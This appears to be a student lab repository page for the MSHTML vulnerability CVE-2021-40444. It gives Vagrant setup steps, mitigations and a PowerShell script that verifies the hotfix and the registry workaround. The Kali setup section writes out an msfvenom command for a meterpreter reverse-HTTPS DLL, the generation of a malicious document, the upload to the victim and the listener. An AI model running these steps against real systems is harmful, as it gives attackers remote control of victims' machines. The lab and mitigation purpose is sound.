Related vulnerability
Title: Microsoft MSHTML.DLL path traversal vulnerability (CVE-2021-40444)
Description: Microsoft MSHTML.DLL is a dynamic link library from Microsoft (USA) used to parse HTML; applications such as IE, Outlook and Outlook Express rely on it. Microsoft MSHTML.DLL contains a path traversal vulnerability: a remote attacker can craft a specially prepared Office document carrying a malicious ActiveX control, lure the victim into opening it, and execute arbitrary code on the system.
Description
TIC4301 Project - CVE-2021-40444
Introduction
# TIC4301_Project
TIC4301 Project - CVE-2021-40444
Download the following vagrant boxes: \
Kali - https://drive.google.com/file/d/1RegQcT2jjFoaQRgLjXDYl4iS0HNt_mU2/view?usp=sharing \
Win10 - https://drive.google.com/file/d/1zcLertRoI-FrHDkRq1NO-KHaF88bMv6e/view?usp=sharing
Import the boxes with the following commands through vagrant:
1. vagrant box add kali_package.box
2. vagrant box add victim_package.box
3. vagrant init kali_package.box
4. vagrant init victim_package.box
5. vagrant up
Setup (win10):
1. In the win10 box, log in as administrator with the password vagrant.
2. Right click script.ps1 on the desktop and run with powershell. (Leave this open)
3. Run ipconfig.exe and obtain the address for this host.
Setup (Kali):
1. `cd Desktop/CVE-2021-40444`.
2. Generate your malicious DLL with msfvenom: `msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll`
3. Start a listener in Metasploit.
4. Generate the malicious document: `python3 exploit.py generate test/calc.dll http://<kali IP>`
5. Visit `http://<win 10 IP>/upload` and upload the file.
6. Listen for the shell.
Mitigations:
1. Install the KB5005565 hotfix.
2. Edit the Windows registry with the patch.reg file from the repository.
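To confirm that both mitigations listed above are actually in place on a Windows 10 host, the following PowerShell check can be run from an elevated prompt. It is an added example, not part of the repository: it verifies that the KB5005565 hotfix is installed and that the registry workaround Microsoft published for CVE-2021-40444 is present (in each Internet Explorer security zone 0 to 3, the ActiveX download actions `1001` and `1004` set to `3`, i.e. disabled). The repository's `patch.reg` is assumed to set those same values; its contents are not shown on this page.

```powershell
# Added mitigation check for CVE-2021-40444 (not part of the repository).
# Registry values are the ActiveX-blocking workaround Microsoft published for this CVE:
# in each IE security zone (0-3), action 1001 ("Download signed ActiveX controls") and
# action 1004 ("Download unsigned ActiveX controls") set to 3 (Disable).
# The repository's patch.reg is assumed to write the same values (assumption; not shown on the page).

$hotfix     = 'KB5005565'
$zonesBase  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
$valueNames = @('1001', '1004')
$disabled   = 3

$results = [System.Collections.Generic.List[object]]::new()

# 1. Hotfix check. Get-HotFix errors out when the ID is not installed, so an empty
#    result with -ErrorAction SilentlyContinue means "missing".
$installed = $null -ne (Get-HotFix -Id $hotfix -ErrorAction SilentlyContinue)
$results.Add([pscustomobject]@{ Check = "Hotfix $hotfix installed"; Ok = $installed })

# 2. Registry workaround check: one row per zone and value name.
foreach ($zone in 0..3) {
    $key = Join-Path $zonesBase $zone
    foreach ($name in $valueNames) {
        # A missing key or value yields $null, which compares unequal to 3 and is reported as not OK.
        $current = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name
        $results.Add([pscustomobject]@{
            Check = "Zone $zone value $name = $disabled"
            Ok    = ($current -eq $disabled)
        })
    }
}

$results | Format-Table -AutoSize

# Non-zero exit code makes the check usable from a configuration-compliance job.
if ($results.Ok -contains $false) {
    Write-Warning 'At least one CVE-2021-40444 mitigation is missing on this host.'
    exit 1
}
```

The registry workaround only blocks the ActiveX installation path; the hotfix is the actual fix, so a host where only the registry rows pass should still be treated as pending patching.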
File snapshot
[4.0K] /data/pocs/b4343cabc15b524da24f72d09915a5b4d6fbe89d
├── [ 609] patch.reg
└── [1.2K] README.md
0 directories, 2 files